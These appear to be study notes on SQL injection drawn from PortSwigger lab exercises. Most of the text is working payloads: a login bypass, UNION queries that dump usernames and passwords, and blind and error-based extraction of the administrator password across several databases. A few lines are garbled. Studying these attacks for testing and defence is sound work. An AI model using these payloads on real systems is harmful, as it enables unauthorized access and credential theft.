https://portswigger.net/web-security/sql-injection/cheat-sheet
SQL Injection in Where Clause
- It retrieves all the data because the condition 1=1 is always true
Pets'OR 1=1--
Select * from products WHERE category=Pets OR 1=1--
- It bypasses the need to enter the password during authentication.
- Include this in the username field
Administrator'--
Select * from users WHERE username='Administrator'-- AND password='test123'
SQL injection UNION attacks
When an application is vulnerable to SQL injection, and the results of the query are returned within the application’s responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack.
The UNION keyword enables you to execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
For a UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible between the individual queries.
To carry out a SQL injection UNION attack, make sure that your attack meets these two requirements. This normally involves finding out:
-
How many columns are being returned from the original query.
-
Which columns returned from the original query are of a suitable data type to hold the results from the injected query.
-
Determine the number of columns using following
' ORDER by 1--
- Second method of determining the number of columns
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Oracle Specific Syntax
On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose. So the injected queries on Oracle would need to look like:
' UNION SELECT NULL FROM DUAL--
The payloads described use the double-dash comment sequence -- to comment out the remainder of the original query following the injection point.
On MySQL, the double-dash sequence must be followed by a space. Alternatively, the hash character # can be used to identify a comment.
Find Columns with useful data types
- Once we know the number of columns we need a way to identify the column that that store string data type.
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
Using a SQL injection UNION attack to retrieve interesting data
Postgres
Here is the Pentest Monkey list for postgres database
=Accessories'Union select 1,usename,3 FROM pg_user--
- Get username and password from table users. Both the columns are of string type.
= Accessories'Union select username,password FROM users--
Select * from products WHERE category='Accessories'Union select username, password FROM users--
Retrieving multiple values within a single column
Postgres
Accessories'Union select NULL,username || ':' || password FROM users--
Oracle
' UNION SELECT username || '~' || password FROM users--
Querying the database type and version
Postgres
SELECT version()
=Accessories'Union select NULL,version(),NULL--
- This is what is happening behind the scene.
Select * from products WHERE category=Accessories'Union select NULL,version(),NULL--
Oracle
SELECT * FROM v$version
MySQL
SELECT @@version
Gifts'Union select NULL,@@version-- +
MSSQL
SELECT @@version
Gifts'Union select NULL,@@version-- +
Listing the contents of the database
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Postgres
- List current database
=Accessories'Union+select+current_database(),NULL--
- List database
Accessories'Union+select+datname,NULL+FROM+pg_database
- list table name
category=Accessories'Union+select+table_name,NULL+FROM+information_schema.tables--
- list column name from the table we selected above
category=Accessories'Union+select+column_name,NULL+FROM+information_schema.columns+Where+table_name%3d'users_ovdpzj'
- List the content of the table with columns
Accessories'Union+select+username_xcmefk,password_jjerqi+FROM+users_ovdpzj--
h>administrator</th>
e63exorvzrog4hbx9od9
SQL Injection Blind
You don’t get the response back in the output
Exploiting blind SQL injection by triggering conditional responses
…xyz' AND '1'='1
…xyz' AND '1'='2
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
- Verify the administrator user and query
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
- Verify password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
- brute force this
AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username%3d'administrator'),5,1)%3d'n
- Cluster bomb attack can be user in the first position where
5as a simple list of numbers andnadd characters and numbers in simple list 2 and start intruder.
SQL Injection Error Based
Exploiting blind SQL injection by triggering conditional errors
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
Second condition results in error division by zero.
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
Oracle
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(1=0)THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+DUAL)%3d'b--
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(1=1)THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+DUAL)%3d'b--
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(username='Administrator')THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+Users)%3d'b--
- Queries payload
TrackingId=19ldBxEHyw2SeqJD'||(SELECT ''+from+dual)||'
TrackingId=19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/1)+ELSE+'b'+END+From+Dual)||'
- verify that the username exist, if it returns error then the query is succesfully executed so the user exist
19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator')||'
- Get length of the password
19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator'+AND+LENGTH(password)>100)||'
- Get the first character of password
- Error means the condition is true
TrackingId=19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator'+AND+SUBSTR(password,1,1)%3d'2')||'
- use this now with cluster bomb attack